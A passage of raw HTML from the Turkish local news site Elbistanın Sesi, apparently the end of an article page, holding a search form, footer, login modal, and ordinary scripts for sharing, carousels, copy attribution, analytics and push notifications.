>Ekim</option> <option value="11" selected>Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2019" selected>2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> <option value="2015" >2015</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2019 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Kaynarca’nın yeni konukları martılar oldu" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> gazete@elbistaninsesi.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fkaynarcanin-yeni-konuklari-martilar-oldu-h64749.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('64749', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 